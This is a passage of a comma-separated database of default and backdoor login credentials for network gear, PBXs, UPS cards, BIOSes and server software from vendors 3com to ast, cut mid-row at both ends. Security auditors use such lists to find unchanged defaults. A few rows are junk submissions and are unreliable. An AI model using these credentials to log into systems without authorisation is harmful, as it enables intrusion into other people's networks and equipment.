Point,01.50-01,Multi,,,Admin,, +3com,Boson router simulator,3.66,HTTP,admin,admin,User,, +3com,CB9000 / 4007,3,Console,Type User: FORCE,,Admin,This will recover a lost password and reset the switch config to Factory Default, +3com,Cable Managment System SQL Database (DOSCIC DHCP),,,DOCSIS_APP,3com,,Win2000 & MS, +3com,CellPlex,,,admin,synnet,,, +3com,CellPlex,,7000,,,,, +3com,CellPlex,,7000,admin,admin,,, +3com,CellPlex,,7000,root,,,, +3com,CellPlex,,7000,tech,tech,,, +3com,CellPlex,,Admin,admin,synnet,,, +3com,CellPlex,,Admin,tech,tech,,, +3com,CellPlex,,HTTP,admin,synnet,Admin,, +3com,CellPlex,,Multi,,,Admin,, +3com,CellPlex,,Multi,admin,admin,Admin,, +3com,CellPlex,7000,Multi,admin,admin,Admin,RS-232/telnet, +3com,CellPlex,7000,Telnet,admin,admin,Admin,, +3com,CellPlex,7000,Telnet,operator,,Admin,, +3com,CellPlex,7000,Telnet,root,,Admin,, +3com,CellPlex,7000,Telnet,tech,,Admin,, +3com,CellPlex,7000,Telnet,tech,tech,Admin,, +3com,CoreBuilder 6000,,,debug,tech,,, +3com,CoreBuilder,,,debug,synnet,,, +3com,CoreBuilder,,,tech,tech,,, +3com,CoreBuilder,,7000/6000/3500/2500,debug,synnet,,, +3com,CoreBuilder,,7000/6000/3500/2500,tech,tech,,, +3com,CoreBuilder,7000/6000/3500/2500,Telnet,,,Admin,, +3com,CoreBuilder,7000/6000/3500/2500,Telnet,,admin,Admin,, +3com,CoreBuilder,7000/6000/3500/2500,Telnet,debug,synnet,,, +3com,CoreBuilder,7000/6000/3500/2500,Telnet,tech,tech,,, +3com,HiPerACT,,v4.1.x,admin,,,, +3com,HiPerARC,,Admin,adm,,,, +3com,HiPerARC,,v4.1.x,adm,,,, +3com,HiPerARC,v4.1.x,Telnet,adm,,,, +3com,HiPerARC,v4.1.x,Telnet,adm,,Admin,, +3com,HiPerARC,v4.1.x,Telnet,admin,,Admin,, +3com,Home Connect,,,User,Password,,, +3com,Internet Firewall,3C16770,HTTP,admin,password,Admin,, +3com,LANplex,,,debug,synnet,,, +3com,LANplex,,,tech,tech,,, +3com,LANplex,,2500,debug,synnet,,, +3com,LANplex,,2500,tech,,,, +3com,LANplex,,Admin,tech,,,, +3com,LANplex,2500,Telnet,debug,synnet,,, +3com,LANplex,2500,Telnet,tech,,Admin,, +3com,LANplex,2500,Telnet,tech,tech,,, +3com,LANplex/Corebuilder line,multiple models,,debug,synnet,,, +3com,LinkBuilder,,,,,,, +3com,LinkBuilder,,Admin,,,,, +3com,LinkBuilder,,Telnet,,,Admin,, +3com,LinkSwitch and CellPlex,,,debug,synnet,,, +3com,LinkSwitch and CellPlex,,,tech,tech,,, +3com,LinkSwitch,,,tech,tech,,, +3com,LinkSwitch,,2000/2700,tech,tech,,, +3com,LinkSwitch,2000/2700,Telnet,tech,tech,,, +3com,LinkSwitch,2700,,debug,synnet,,, +3com,Linkbuilder 3500,,,administer,administer,,, +3com,NAC (Network Access Card),,,adm,,,, +3com,NBX100,,,administrator,0,,2.8, +3com,NetBuilder,,,,ANYCOM,,, +3com,NetBuilder,,,,admin,,, +3com,NetBuilder,,SNMP,,ANYCOM,snmp-read,, +3com,NetBuilder,,SNMP,,ILMI,snmp-read,, +3com,NetBuilder,,SNMP,,admin,User,SNMP_READ, +3com,NetBuilder,,User,,admin,,, +3com,NetBuilder,,snmp-read,,ANYCOM,,, +3com,NetBuilder,,snmp-read,,ILMI,,, +3com,Netbuilder,,,Root,,,, +3com,Netbuilder,,,admin,,,, +3com,Netbuilder,,HTTP,Root,,Admin,http://10.1.0.1, +3com,Netbuilder,,Multi,admin,,Admin,, +3com,Office Connect ISDN Routers,,5x0,,PASSWORD,,, +3com,Office Connect ISDN Routers,,Admin,,PASSWORD,,, +3com,OfficeConnect 812 ADSL,,,adminttd,adminttd,,, +3com,OfficeConnect 812 ADSL,,01.50-01,admin,,,, +3com,OfficeConnect 812 ADSL,,Admin,admint|,admint|,,, +3com,OfficeConnect 812 ADSL,,Multi,adminttd,adminttd,Admin,, +3com,OfficeConnect 812 ADSL,01.50-01,Multi,admin,,Admin,, +3com,OfficeConnect ADSL Wireless 11g Firewall Router,3CRWDR100-72,HTTP,,admin,Admin,http://192.168.1.1, +3com,OfficeConnect ISDN Routers,5x0,Telnet,,PASSWORD,Admin,, +3com,OfficeConnect Remote 812,,,root,!root,,, +3com,OfficeConnect Remote 840,,,root,!root,,, +3com,OfficeConnect Remote Router,,812 ADSL 840 SDSL,root,!root,,, +3com,OfficeConnect Wireless 11g Cable/DSL Gateway,,,,admin,,, +3com,OfficeConnect Wireless 11g Cable/DSL Gateway,,HTTP,,admin,Admin,, +3com,OfficeConnect,,Multi,,,Admin,, +3com,OfficeConnect,11g,Multi,admin,,User,, +3com,Router,3000/5000 Series,Boot Prompt,,,Admin,, +3com,SS III Switch,,4xxx (4900 - sure),recovery,recovery,,, +3com,Shark Fin,Comcast-supplied,HTTP,User,Password,Diagnostics page,192.160.100.1, +3com,SuperStack 2700,,,tech,tech,,, +3com,SuperStack 3,,4400-49XX,manager,manager,,, +3com,SuperStack 3,,4XXX,admin,,,, +3com,SuperStack 3,,4XXX,monitor,monitor,,, +3com,SuperStack II Dual Speed 500,,,security,security,,, +3com,SuperStack II Netbuilder,11.1,Multi,,,Admin,, +3com,SuperStack II Switch 1100,,,manager,manager,,, +3com,SuperStack II Switch 1100,,,security,security,,, +3com,SuperStack II Switch 3300,,,manager,manager,,, +3com,SuperStack II Switch,,,debug,synnet,,, +3com,SuperStack II Switch,,,manager,manager,,Any, +3com,SuperStack II Switch,,,monitor,monitor,,Any, +3com,SuperStack II Switch,,,tech,password,,Any, +3com,SuperStack II Switch,,1100/3300,admin,,,, +3com,SuperStack II Switch,,1100/3300,manager,manager,,, +3com,SuperStack II Switch,,1100/3300,monitor,monitor,,, +3com,SuperStack II Switch,,1100/3300,security,security,,, +3com,SuperStack II Switch,,2200,debug,synnet,,, +3com,SuperStack II Switch,,2700,tech,tech,,, +3com,SuperStack II Switch,,Admin,tech,tech,,, +3com,SuperStack II Switch,1100/3300,Console,3comcso,RIP000,initialize,resets all pws to defaults, +3com,SuperStack II Switch,2200,Telnet,debug,synnet,,, +3com,SuperStack II Switch,2700,Telnet,tech,tech,Admin,, +3com,SuperStack II,,Console,,,Admin,, +3com,SuperStack III Switch,3300XM,Multi,security,security,Admin,, +3com,SuperStack III Switch,4400-49XX,Multi,manager,manager,User can access/change operational setting but not security settings,, +3com,SuperStack III Switch,4XXX,Multi,admin,,Admin,, +3com,SuperStack III Switch,4XXX,Multi,monitor,monitor,User,, +3com,SuperStack III Switch,4xxx (4900 - sure),Telnet,recovery,recovery,resets_all_to_default,u need to power off unit. tbl_ , +3com,SuperStack III Switch,4xxx (4900 - sure),console,recover,recover,Admin,, +3com,Superstack 3 switch,,4900,recover,recover,,, +3com,Switch 3000/3300,,,Admin,3com,,, +3com,Switch 3000/3300,,,admin,admin,,, +3com,Switch 3000/3300,,,manager,manager,,, +3com,Switch 3000/3300,,,monitor,monitor,,, +3com,Switch 3000/3300,,,security,security,,, +3com,Switch,,3300XM,admin,admin,,, +3com,Switch,3300XM,Multi,admin,admin,Admin,, +3com,US Robotics ADSL Router,,8550,,12345,,, +3com,Wireless AP,,,,comcomcom,,, +3com,Wireless AP,,ANY,admin,comcomcom,,, +3com,Wireless AP,,Admin,admin,comcomcom,,, +3com,Wireless AP,ANY,Multi,admin,comcomcom,Admin,Works on all 3com wireless APs, +3com,boson router simulator,,User,admin,admin,,, +3com,cellplex,,,,,,, +3com,cellplex,,7000,operator,,,, +3com,cellplex,,Admin,admin,admin,,, +3com,corebuilder,,7000,operator,admin,,, +3com,e960,3CRWDR100-72,Admin,Admin,Admin,HTTP,http://192.168.1.1, +3com,hub,,,,,,, +3com,hub,,Admin,,,,, +3com,hub,,Multi,,,Admin,, +3com,router,,,,,,, +3com,router,,Admin,,,,, +3com,super stack 2 switch,,,manager,manager,,, +3com,super stack II,,,,,,, +3com,super stack II,,Admin,,,,, +3com,super,,,admin,,,, +3com,superstack II,,1100/3300,3comcso,RIP000,,, +3com,superstack II,,initialize,3comcso,RIP000,,, +3m,VOL-0215 etc.,,,volition,volition,,, +3m,VOL-0215 etc.,,Admin,volition,volition,,, +3m,VOL-0215 etc.,,SNMP,volition,volition,Admin,Volition fiber switches, +3ware,3DM,,HTTP,Administrator,3ware,Admin,, +acc,Any router,,,netman,netman,,all, +acc,Congo/Amazon/Tigris,,,netman,netman,,All versions, +acc,Tigris Platform,All,Multi,public,,Guest,, +accelerated networks,DSL CPE and DSLAM,,,sysadm,anicust,,, +acceleratednetworks,DSL CPE and DSLAM,,Telnet,sysadm,anicust,,, +accton t_online,accton,,,,0,,, +accton,CheetahChassis Workgroup Switch,3714,SNMP/HTTP/Telnet,admin,,,, +accton,CheetahChassis Workgroup Switch,3714,SNMP/HTTP/Telnet,manager,manager,,, +accton,CheetahChassis Workgroup Switch,3714,SNMP/HTTP/Telnet,monitor,monitor,,, +accton,T-ONLINE,,aaaaaaa,,0,,, +accton,Wireless Router,T-online,HTTP,,0,Admin,, +accton,Wireless Router,T-online,HTTP,,0000,Admin,, +accton,Wirelessrouter,,T-online,,0,,, +aceex,Modem ADSL Router,,,admin,,,, +aceex,Modem ADSL Router,,HTTP,admin,,Admin,, +acer,517te,,,,,,, +acer,BIOS,,,,,,, +acer,BIOS,,Console,,,Admin,, +acer,Phoenix,,,,,,, +acer,acer,,,acer,acer,,, +acorp,all routers,,http,Admin,Admin,,, +actiontec,,,192.168.1.1,admin,password1,Admin,This the password commonly set by VZ Techs., +actiontec,GE344000-01 Router,,,,,,, +actiontec,GT701-GW,,Multi,admin,admin,,, +actiontec,GT701-WG,,192.168.1.1,admin,password,,, +actiontec,GT701-WG,,HTTP,admin,password,192.168.1.1,, +actiontec,gt701,,http://192.168.0.1,admin,,,, +actiontec,gt701-gw,,,admin,admin,,, +adaptec,RAID Controller,,,Administrator,adaptec,,, +adaptecraid,Storage Manager Pro,,,Administrator,adaptec,,All, +adc kentrox,Pacesetter Router,,,,secret,,, +adckentrox,Pacesetter Router,,Telnet,,secret,,, +adcompletecom,Ban Man Pro,,,Admin1,Admin1,,, +adic,24,,HTTP,admin,password,,, +adic,Scalar 100/1000,,HTTP,admin,secure,Admin,, +adic,Scalar i2000,,Multi,admin,password,Admin,, +adp,ADP Payroll Database,,,sys,adpadmin,,, +adp,ADP Payroll HR database,,Admin,sysadmin,master,,, +adp,ADP Payroll HR database,,All,sysadmin,master,,, +adp,ADP Payroll HR database,All,Multi,sysadmin,master,Admin,, +adtech,AX4000,,,root,ax400,,, +adtech,AX4000,,,root,ax400,Admin,, +adtran,Agent Card,,,,ADTRAN,,, +adtran,Agent Card,,Telnet,,ADTRAN,Admin,ctrl-PTT, +adtran,Atlas 800/800Plus/810Plus/550,,,,Password,,, +adtran,Atlas 800/800Plus/810Plus/550,,Telnet,,Password,Admin,crtl-L, +adtran,Express 5110/5200/5210,,,,adtran,,, +adtran,Express 5110/5200/5210,,Telnet,,adtran,Admin,hit enter a few times, +adtran,MX2800,,,,adtran,,, +adtran,MX2800,,Telnet,,adtran,Admin,hit enter a few times, +adtran,NetVanta 7100,,,admin,password,,, +adtran,NetVanta 7100,,Multi,admin,password,,, +adtran,NxIQ,,,,adtran,,, +adtran,NxIQ,,Telnet,,adtran,Admin,hit enter a few times, +adtran,Smart 16/16e,,,,PASSWORD,,, +adtran,Smart 16/16e,,Telnet,,,Admin,hit enter a few times, +adtran,Smart 16/16e,,Telnet,,PASSWORD,Admin,hit enter a few times, +adtran,T3SU 300,,,,adtran,,, +adtran,T3SU 300,,Telnet,,adtran,Admin,Hit enter a few times, +adtran,TSU IQ/DSU IQ,,,,,,, +adtran,TSU IQ/DSU IQ,,Telnet,,,Admin,hit enter a few times, +adtran,TSU Router Module/L128/L768/1.5,,,,,,, +adtran,TSU Router Module/L128/L768/1.5,,Telnet,,,Admin,hit enter a few times, +advanced integration,PC BIOS,,,,Advance,,, +advanced integration,PC BIOS,,Admin,,Advance,,, +advancedintegration,PC BIOS,,Console,,Advance,Admin,, +advanteknetworks,Wireless LAN 802.11 g/b,,Multi,admin,,Admin,, +aethra,Starbridge EU,,HTTP,admin,password,Admin,, +airlink plus,RTW026,,V0.80.0010 (firmware),,admin,,, +aironet,(All),,,,,,, +aironet,all products,all vers,,,,,, +airway,Transport,,,,0000,admin,, +aladdin,eSafe Appliance,,,root,kn1TG7psLu,,, +aladdin,eSafe Appliance,,Console/SSH,root,kn1TG7psLu,root,, +alcatel thomson,SpeedTouch580,,,admin,admin,,, +alcatel,4400,,Console,mtcl,,User,, +alcatel,4400,,Superuser,superuser,superuser,,, +alcatel,6224-24p,,console,admin,switch,,, +alcatel,OS6850-24p,,console,admin,switch,,, +alcatel,OXO,1.3,Multi,,admin,User,, +alcatel,Office 4200,,,,1064,,, +alcatel,Office 4200,,Admin,,1064,,, +alcatel,Office 4200,,Multi,,1064,Admin,, +alcatel,OmniPCX Office,,Admin,ftp_admi,kilo1987,,, +alcatel,OmniPCX Office,,Installer,ftp_inst,pbxk1064,,, +alcatel,OmniPCX Office,,NMC,ftp_nmc,tuxalize,,, +alcatel,OmniPCX Office,,Operator,ftp_oper,help1954,,, +alcatel,OmniPCX Office,4.1,FTP,ftp_admi,kilo1987,Admin,, +alcatel,OmniPCX Office,4.1,FTP,ftp_inst,pbxk1064,Installer,, +alcatel,OmniPCX Office,4.1,FTP,ftp_nmc,tuxalize,NMC,, +alcatel,OmniPCX Office,4.1,FTP,ftp_oper,help1954,Operator,, +alcatel,OmniPCX Office,4.1,Multi,ftp_admi,kilo1987,Admin,, +alcatel,OmniPCX Office,4.1,Other,ftp_inst,pbxk1064,Installer,, +alcatel,OmniPCX Office,4.1,Other,ftp_nmc,tuxalize,NMC,, +alcatel,OmniPCX Office,4.1,Other,ftp_oper,help1954,Operator,, +alcatel,OmniPCX,4.1 and above,Voicemail (User),,1515,,, +alcatel,OmniStack 6024,,,admin,switch,,, +alcatel,OmniStack 6024,,Admin,admin,switch,,, +alcatel,OmniStack 6024,,Telnet,admin,switch,Admin,, +alcatel,OmniStack/OmniSwitch,,Telnet,diag,switch,Admin,, +alcatel,OmniStack/OmniSwitch,,Telnet/Console,diag,switch,Admin,, +alcatel,Omnistack/Omniswitch,,,diag,switch,,, +alcatel,PBX,,4400,adfexc,adfexc,,, +alcatel,PBX,,4400,at4400,at4400,,, +alcatel,PBX,,4400,client,client,,, +alcatel,PBX,,4400,dhs3mt,dhs3mt,,, +alcatel,PBX,,4400,dhs3pms,dhs3pms,,, +alcatel,PBX,,4400,halt,tlah,,, +alcatel,PBX,,4400,install,llatsni,,, +alcatel,PBX,,4400,kermit,kermit,,, +alcatel,PBX,,4400,mtch,mtch,,, +alcatel,PBX,,4400,mtcl,mtcl,,, +alcatel,PBX,,4400,root,letacla,,, +alcatel,PBX,,unknown,adfexc,adfexc,,, +alcatel,PBX,,unknown,at4400,at4400,,, +alcatel,PBX,,unknown,client,client,,, +alcatel,PBX,,unknown,dhs3mt,dhs3mt,,, +alcatel,PBX,,unknown,dhs3pms,dhs3pms,,, +alcatel,PBX,,unknown,halt,tlah,,, +alcatel,PBX,,unknown,install,llatsni,,, +alcatel,PBX,,unknown,kermit,kermit,,, +alcatel,PBX,,unknown,mtch,mtch,,, +alcatel,PBX,,unknown,mtcl,mtcl,,, +alcatel,PBX,,unknown,root,letacla,,, +alcatel,PBX,4400,Port 2533,adfexc,adfexc,unknown,, +alcatel,PBX,4400,Port 2533,at4400,at4400,unknown,, +alcatel,PBX,4400,Port 2533,client,client,unknown,, +alcatel,PBX,4400,Port 2533,dhs3mt,dhs3mt,unknown,, +alcatel,PBX,4400,Port 2533,dhs3pms,dhs3pms,unknown,, +alcatel,PBX,4400,Port 2533,halt,tlah,shutdown,, +alcatel,PBX,4400,Port 2533,install,llatsni,unknown,, +alcatel,PBX,4400,Port 2533,kermit,kermit,unknown,, +alcatel,PBX,4400,Port 2533,mtch,mtch,unknown,, +alcatel,PBX,4400,Port 2533,mtcl,mtcl,unknown,, +alcatel,PBX,4400,Port 2533,root,letacla,unknown,, +alcatel,SpeedTouch 510,,HTTP/Telnet,,,,Default IP 192.168.1.254/24, +alcatel,SpeedTouch 580,4.3.19,HTTP,admin,admin,,, +alcatel,Speedtouch,,500 series,,,,, +alcatel,Timestep VPN 1520,3.00.026,Permit config and console,root,permit,Admin,Perm/Config port 38036, +alcatel,Timestep VPN Gateway 15xx/45xx/7xxx,,,root,permit,,Any, +allan,ass,,tool,tool,face,,, +allied telesyn,8326G,,,,,,, +allied telesyn,AT-8024(GB),,,,admin,,, +allied telesyn,AT-8024(GB),,,manager,admin,,, +allied telesyn,AT-8024(GB),,any,,admin,,, +allied telesyn,All,,Admin,manager,friend,,, +allied telesyn,All,,All,manager,friend,,, +allied telesyn,Generic Switch/Router,,,manager,friend,,, +allied telesyn,Generic Switch/Router,,Admin,manager,friend,,, +allied telesyn,Rapier G6 Switch,,,,manager,,, +allied telesyn,Switch,,AT-8124XL 1.0.3,admin,,,, +allied telesyn,Switch,,Admin,admin,,,, +allied,CJ8MO E-U,,,,,,, +allied,CJ8MO E-U,,Admin,,,,, +allied,CJ8MO E-U,,Telnet,,,Admin,, +allied,Telesyn,,,manager,friend,,, +allied,Telesyn,,,secoff,secoff,,, +allied,Telesyn,,Admin,manager,friend,,, +allied,Telesyn,,Admin,secoff,secoff,,, +allied-telesyn,AT-8550GB,,,manager,friend,,, +allied-telesyn,AT-RG613LH,,,manager,friend,,, +alliedtelesyn,ALAT8326GB,,Multi,manager,manager,Admin,, +alliedtelesyn,AT Router,,HTTP,root,,Admin,, +alliedtelesyn,AT-8024(GB),,Console,,admin,Admin,, +alliedtelesyn,AT-8024(GB),,HTTP,manager,admin,Admin,, +alliedtelesyn,AT-8550GB,,Telnet,manager,friend,,, +alliedtelesyn,AT-AR130 (U) -10,,HTTP,Manager,friend,Admin,Default IP is 192.168.242.242, +alliedtelesyn,AT-AR750S,,,manager,friend,,, +alliedtelesyn,AT-RG613LH,2-3_59,Telnet,manager,friend,,, +alliedtelesyn,AT8000S/24,v1.1.0.32,serial console,manager,friend,admin,, +alliedtelesyn,AT8016F,,Console,manager,friend,Admin,, +alliedtelesyn,All Routers,,,Manager,Friend,,Any, +alliedtelesyn,All,All,Telnet,manager,friend,Admin,, +alliedtelesyn,Allied Telesyn,AR410,,Administrator,admin,,, +alliedtelesyn,Generic Switch/Router,,Multi,manager,friend,Admin,, +alliedtelesyn,R130,,,Manager,friend,,, +alliedtelesyn,Rapier G6 Switch,,,manager,friend,,, +alliedtelesyn,Switch,AT-8124XL 1.0.3,Multi,admin,,Admin,, +alliedtelesyn,Various,,Multi,manager,friend,Admin,, +alliedtelesyn,Various,,Multi,secoff,secoff,Admin,, +alliedtelesyn,at-img634w,a+,multi,manager,friend,,, +alliedtelesyn,windows xp, AR410,http://192.168.1.174,admin,admin,user,HACK, +allnet,ALL0275 802.11g AP,,1.0.6,,admin,,, +allnet,ALL0275 802.11g AP,1.0.6,HTTP,,admin,Admin,, +allnet,ALL129DSL,,,admin,admin,,, +allnet,ALL129DSL,,,admin,admin,Administrator,Likely the default on all routers, +allnet,T-DSL Modem,,Software Version: v1.51,admin,admin,,, +allnet,T-DSL Modem,Software Version: v1.51 ,HTTP,admin,admin,Admin,, +allot,Netenforcer,,,admin,allot,,, +allot,Netenforcer,,,admin,allot,Admin,, +allot,Netenforcer,,,root,bagabu,,, +allot,Netenforcer,,,root,bagabu,Admin,, +alteon,ACEDirector3,,,admin,,,, +alteon,ACEDirector3,,console,admin,,,, +alteon,ACEswitch 180e (telnet),,,admin,blank,,, +alteon,ACEswitch,,,admin,,,, +alteon,ACEswitch,,180e,admin,,,, +alteon,ACEswitch,,Admin,admin,admin,,, +alteon,ACEswitch,,Admin,admin,linga,,, +alteon,ACEswitch,180e,HTTP,admin,admin,Admin,, +alteon,ACEswitch,180e,HTTP,admin,linga,Admin,, +alteon,AD4,9,Console,admin,admin,Admin,Factory default, +alteon,All hardware releases,,,,admin,,Web OS 5.2, +ambit,,,,admin,cableroot,root,, +ambit,ADSL,,,root,,,, +ambit,ADSL,,Admin,root,,,, +ambit,ADSL,,Telnet,root,,Admin,, +ambit,Cable Modem 60678eu,,1.12,root,root,,, +ambit,Cable Modem 60678eu,1.12,Multi,root,root,Admin,, +ambit,Cable Modem,,,root,root,,, +ambit,Cable Modem,,Multi,root,root,Admin,Time Warner Cable issued modem, +ambit,Cable Modem,,Multi,user,user,,, +ambit,DOCSIS 1.0/1.1/2.0 Compliant,5.66.1011,,user,,user,, +ambit,ntl:home 200,2.67.1011,HTTP,root,root,Admin,This is the cable modem supplied by NTL in the UK, +ami bios,1999,,AT 49,,,,, +ami,PC BIOS,,,,AMI.KEY,,, +ami,PC BIOS,,,,AMISETUP,,, +ami,PC BIOS,,Admin,,A.M.I,,, +ami,PC BIOS,,Admin,,AM,,, +ami,PC BIOS,,Admin,,AMI!SW,,, +ami,PC BIOS,,Admin,,AMI,,, +ami,PC BIOS,,Admin,,AMI.KEY,,, +ami,PC BIOS,,Admin,,AMI.KEZ,,, +ami,PC BIOS,,Admin,,AMI?SW,,, +ami,PC BIOS,,Admin,,AMIAMI,,, +ami,PC BIOS,,Admin,,AMIDECOD,,, +ami,PC BIOS,,Admin,,AMIPSWD,,, +ami,PC BIOS,,Admin,,AMISETUP,,, +ami,PC BIOS,,Admin,,AMI_SW,,, +ami,PC BIOS,,Admin,,AMI~,,, +ami,PC BIOS,,Admin,,BIOSPASS,,, +ami,PC BIOS,,Admin,,HEWITT RAND,,, +ami,PC BIOS,,Admin,,aammii,,, +ami,PC BIOS,,Console,,A.M.I,Admin,, +ami,PC BIOS,,Console,,AAAMMMIII,Admin,, +ami,PC BIOS,,Console,,AM,Admin,, +ami,PC BIOS,,Console,,AMI!SW,Admin,, +ami,PC BIOS,,Console,,AMI,Admin,, +ami,PC BIOS,,Console,,AMI.KEY,Admin,, +ami,PC BIOS,,Console,,AMI.KEZ,Admin,, +ami,PC BIOS,,Console,,AMI?SW,Admin,, +ami,PC BIOS,,Console,,AMIAMI,Admin,, +ami,PC BIOS,,Console,,AMIDECOD,Admin,, +ami,PC BIOS,,Console,,AMIPSWD,Admin,, +ami,PC BIOS,,Console,,AMISETUP,Admin,, +ami,PC BIOS,,Console,,AMI_SW,Admin,, +ami,PC BIOS,,Console,,AMI~,Admin,, +ami,PC BIOS,,Console,,BIOS,Admin,, +ami,PC BIOS,,Console,,BIOSPASS,Admin,, +ami,PC BIOS,,Console,,CMOSPWD,Admin,, +ami,PC BIOS,,Console,,CONDO,Admin,, +ami,PC BIOS,,Console,,HEWITT RAND,Admin,, +ami,PC BIOS,,Console,,LKWPETER,Admin,, +ami,PC BIOS,,Console,,MI,Admin,, +ami,PC BIOS,,Console,,Oder,Admin,, +ami,PC BIOS,,Console,,PASSWORD,Admin,, +ami,PC BIOS,,Console,,aammii,Admin,, +ami,at 49,,,,,,, +amigo,ADSL Router,,,admin,epicrouter,,, +amitech,wireless router and access point 802.11g 802.11b,any,HTTP,admin,admin,Admin,Web interface is on 192.168.1.254 available on the LAN ports of the AP., +amptron,PC BIOS,,,,Polrty,,, +amptron,PC BIOS,,Admin,,Polrty,,, +amptron,PC BIOS,,Console,,Polrty,Admin,, +andover controls,Infinity,,any,acc,acc,,, +andovercontrols,Infinity,any,Console,acc,acc,Admin,Building managment system, +aoc,zenworks 4.0,,Multi,,admin,Admin,, +apache project,,,Apache,jj,,,, +apache,TomCat,,HTTP,admin,admin,,, +apache,TomCat,,HTTP,admin,tomcat,,, +apache,TomCat,,HTTP,role,changethis,,, +apache,TomCat,,HTTP,role1,role1,,, +apache,TomCat,,HTTP,root,changethis,,, +apache,TomCat,,HTTP,root,root,,, +apache,TomCat,,HTTP,tomcat,changethis,,, +apache,TomCat,,HTTP,tomcat,tomcat,,, +apache,Tomcat,,,admin,tomcat,,, +apache,Tomcat,,,role,changethis,,, +apache,Tomcat,,,role1,role1,,, +apache,Tomcat,,,root,changethis,,, +apache,Tomcat,,,tomcat,tomcat,,, +apache,jboss4,,jmx-console,admin,jboss4,,, +apc,9606 Smart Slot,,,,backdoor,,, +apc,9606 Smart Slot,,Telnet,,backdoor,Admin,, +apc,9606 Smart Slot,AOS 3.2.1 and AOS 3.0.3,Telnet,(any),TENmanUFactOryPOWER,,, +apc,AP9606 SmartSlot Web/SNMP Management Card,,AOS 3.2.1 and AOS 3.0.3,(any),TENmanUFactOryPOWER,,, +apc,AP9606,,,apc,apc,Admin,, +apc,Any,,,apcuser,apc,,, +apc,Call-UPS,,AP9608,,serial number of the Call-UPS,,, +apc,Call-UPS,AP9608,Console,,(Device Serial Number),Admin,, +apc,MasterSwitch,,AP9210,apc,apc,,, +apc,MasterSwitch,AP9210,,apc,apc,Admin,, +apc,PowerChute Bussiness Edition,,Installed program,Pingo,Ura,Admin access,, +apc,Powerchute Plus,,4.x for Netware 3.x/4.x,POWERCHUTE,APC,,, +apc,Powerchute Plus,4.x for Netwware 3.x/4.x,Console,POWERCHUTE,APC,Admin,, +apc,SNMP Adapter,,2.x,apc,apc,,, +apc,SNMP Adapter,2.x,,apc,apc,,, +apc,Share-UPS,,AP9207,,serial number of the Share-UPS,,, +apc,Share-UPS,AP9207,Console,,(Device Serial Number),Admin,, +apc,Smart UPS,,Multi,apc,apc,Admin,, +apc,Smartups 3000,,HTTP,apc,apc,Admin,, +apc,Smartups 5000,,HTTP,apc,apc,admin,, +apc,UPS,,,apc,apc,,, +apc,UPS,,Admin,apc,apc,,, +apc,UPS,,Telnet,apc,apc,Admin,, +apc,UPSes (Web/SNMP Mgmt Card),,HTTP,device,device,Admin,Secondary access account (next to apc/apc), +apc,USV Network Management Card,,,,TENmanUFactOryPOWER,,, +apc,USV Network Management Card,,SNMP,,TENmanUFactOryPOWER ,Admin,nachzulesen unter http://www.heise.de/security/news/meldung/44899 gruss HonkHase, +apc,Web/SNMP Management Card,,AP9606,apc,apc,,, +apple computer,Airport,,,,public,,, +apple computer,Network Assistant,,,,xyzzy,,, +apple computer,Remote Desktop,,,,xyzzy,,, +apple,AirPort Base Station (Graphite),,2,,public,,, +apple,AirPort Base Station (Graphite),2,Multi,,public,public,See Apple article number 58613 for details, +apple,Airport Base Station (Dual Ethernet),,2,,password,,, +apple,Airport Base Station (Dual Ethernet),2,Multi,,password,Guest,See Apple article number 106597 for details, +apple,Airport Extreme Base Station,,2,,admin,,, +apple,Airport Extreme Base Station,2,Multi,,admin,Guest,see Apple article number 107518 for details, +apple,Airport,,,,public,,1.1, +apple,Airport,,Administrative,admin,public,,, +apple,Airport,,Other,admin,public,Administrative,, +apple,Airport,5,1.0.09,Multi,root,admin,, +apple,Network Assistant,,,None,xyzzy,Admin,3.X, +apple,Remote Desktop,,,,xyzzy,Admin,, +apple,iPod Touch,,,root/mobile,alpine,,, +arcor,Easybox,all,http://192.168.2.1,root,123456,Root,, +areca,RAID controllers,,Console,admin,0,Admin,, +arescom,modem/router ,10XX,Telnet,,atc123,Admin,, +arlotto,SG205,,HTTP,admin,123456,https://192.168.2.1,, +arlotto,SG205,,https://192.168.2.1,admin,123456,,, +armenia,Forum,,No,admin,admin,,, +arrowpoint,Any,,,admin,system,Admin,, +arrowpoint,Unknown,,,,,,, +arrowpoint,Unknown,,,admin,system,,, +arrowpoint,Various,,,,,Admin,, +arrowpoint,windows xp,all,192.168.0.1,admin,arrowpoint,,, +artem,ComPoint - CPD-XT-b,CPD-XT-b,Telnet,,admin,Admin,, +asante,FM2008,,Multi,admin,asante,Admin,, +asante,FM2008,,Telnet,superuser,,Admin,, +asante,FM2008,01.06,Telnet,superuser,asante,Admin,, +asante,IntraStack,,,IntraStack,Asante,,, +asante,IntraStack,,Admin,IntraStack,Asante,,, +asante,IntraStack,,multi,IntraStack,Asante,Admin,, +asante,IntraSwitch,,,IntraSwitch,Asante,,, +asante,IntraSwitch,,Admin,IntraSwitch,Asante,,, +asante,IntraSwitch,,multi,IntraSwitch,Asante,Admin,, +ascend,All TAOS models,,,admin,Ascend,,all, +ascend,Router,,,,ascend,,, +ascend,Router,,Admin,,ascend,,, +ascend,Router,,Telnet,,ascend,Admin,, +ascend,Sahara,,,root,ascend,,, +ascend,Sahara,,Multi,root,ascend,,, +ascend,Yurie,,,readonly,lucenttech2,,, +ascend,Yurie,,,readwrite,lucenttech1,,, +ascend,Yurie,,Multi,readonly,lucenttech2,,, +ascend,Yurie,,Multi,readwrite,lucenttech1,,, +ascom,Ascotel PBX,,ALL,,3ascotel,,, +ascom,Ascotel PBX,ALL,Multi,,3ascotel,Admin,, +asdsa,sadsa,,asdsad,12321,sadsad,,, +asmack,router,ar804u,HTTP,admin,epicrouter,Admin,, +asmax,AR701u / ASMAX AR6024,,HTTP,admin,epicrouter,Admin,, +asmax,AR800C2,,HTTP,admin,epicrouter,Admin,, +asmax,Ar-804u,,HTTP,admin,epicrouter,Admin,, +aspect,ACD,,6,DTA,TJM,,, +aspect,ACD,,6,customer,,,, +aspect,ACD,,7,DTA,TJM,,, +aspect,ACD,,8,DTA,TJM,,, +aspect,ACD,,User,DTA,TJM,,, +aspect,ACD,,User,customer,,,, +aspect,ACD,6,HTTP,customer,,User,views error logs, +aspect,ACD,6,Oracle,DTA,TJM,User,, +aspect,ACD,7,Oracle,DTA,TJM,User,, +aspect,ACD,8,Oracle,DTA,TJM,User,, +ast,PC BIOS,,,,SnuFG5,,, +ast,PC BIOS,,Admin,,SnuFG5,,, +ast,PC BIOS,,Console,,SnuFG5,Admin,, +ast,Powerexec 